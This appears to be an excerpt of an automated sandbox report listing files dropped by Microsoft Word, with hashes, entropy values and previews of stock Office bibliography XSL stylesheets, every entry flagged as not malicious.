                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9191
                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4326
                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):7370
                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5596
                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3683
                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4888
                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6448
                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5630
                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6193
                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3075
                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5151
                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):333258
                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):296658
                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268317
                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):255948
                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):251032
                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284415
                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294178
                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270198
                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):217137
                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254875
                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                Malicious:false
